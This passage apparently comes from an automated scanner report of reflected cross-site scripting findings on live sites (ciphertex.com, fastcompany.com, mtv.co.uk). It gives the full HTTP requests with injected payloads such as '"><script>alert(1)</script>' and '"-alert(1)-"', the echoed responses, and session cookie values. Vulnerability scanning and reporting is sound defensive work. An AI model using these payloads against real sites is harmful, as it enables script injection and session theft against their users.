...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quoteb1a5e"><a>6fbabd2ed7f-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78f82"><a>e24ed7b784c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quote/78f82"><a>e24ed7b784c?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:26 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quote-78f82"><a>e24ed7b784c" class="section-sites sidebar-none">
...[SNIP]...

2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_attribute/uc_attribute.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64cf"><a>25774fd7546 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercarta64cf"><a>25774fd7546/uc_attribute/uc_attribute.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:19 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercarta64cf"><a>25774fd7546-uc_attribute-uc_attribute.css" class="section-sites sidebar-none">
...[SNIP]...

2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a3eb"><a>6d01f6ced87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9a3eb"><a>6d01f6ced87/all/modules/ubercart/uc_order/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:40 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9a3eb"><a>6d01f6ced87-all-modules-ubercart-uc_order-uc_order.css" class="section-9a3eb">
...[SNIP]...

2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c01"><a>0a6bfc45d0a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/34c01"><a>0a6bfc45d0a/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10029
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-34c01"><a>0a6bfc45d0a-uc_order.css" class="section-sites sidebar-none">
...[SNIP]...

2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_product/uc_product.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37679"><a>cd992addf4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/uc_product37679"><a>cd992addf4/uc_product.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-uc_product37679"><a>cd992addf4-uc_product.css" class="section-sites sidebar-none">
...[SNIP]...

2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/views_accordion/views-accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac140"><a>ee39bd0a068 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modulesac140"><a>ee39bd0a068/views_accordion/views-accordion.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:32 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modulesac140"><a>ee39bd0a068-views_accordion-views-accordion.css" class="section-sites sidebar-none">
...[SNIP]...

2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/fose.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84d"><a>7d48320370f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/files2c84d"><a>7d48320370f/banners/fose.jpg?1308766591 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:10 GMT
Vary: Accept-Encoding
Content-Length: 10030
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-files2c84d"><a>7d48320370f-banners-fose.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/super_savings.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb692"><a>81b6a9dd69a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/filesbb692"><a>81b6a9dd69a/banners/super_savings.jpg?1312833278 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:26 GMT
Vary: Accept-Encoding
Content-Length: 10048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-filesbb692"><a>81b6a9dd69a-banners-super_savings.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d78c8"><a>08c8f38d311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesd78c8"><a>08c8f38d311/default/files/hp.swf HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:45 GMT
Vary: Accept-Encoding
Content-Length: 10020
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitesd78c8"><a>08c8f38d311-default-files-hp.swf" class="section-sitesd78c8">
...[SNIP]...

2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32443"><a>bbdb3da3f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland32443"><a>bbdb3da3f46/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:16 GMT
Vary: Accept-Encoding
Content-Length: 10022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland32443"><a>bbdb3da3f46-minnelli-minnelli.css" class="section-themes sidebar-none">
...[SNIP]...

2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f99"><a>90e517ca856 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/13f99"><a>90e517ca856/style.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:25 GMT
Vary: Accept-Encoding
Content-Length: 9984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-13f99"><a>90e517ca856-style.css" class="section-themes sidebar-none">
...[SNIP]...

2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9780e"><a>2292d728864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland/style.css9780e"><a>2292d728864?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:18 GMT
Vary: Accept-Encoding
Content-Length: 9998
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland-style.css9780e"><a>2292d728864" class="section-themes sidebar-none">
...[SNIP]...

2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9939"><script>alert(1)</script>44507fb50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a9939"><script>alert(1)</script>44507fb50f4=1 HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:58 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:09:18 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:17 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1315831757-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Content-Length: 67722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="canonical" href="/?a9939"><script>alert(1)</script>44507fb50f4=1" />
...[SNIP]...

2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9a84"-alert(1)-"276e5b2f698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
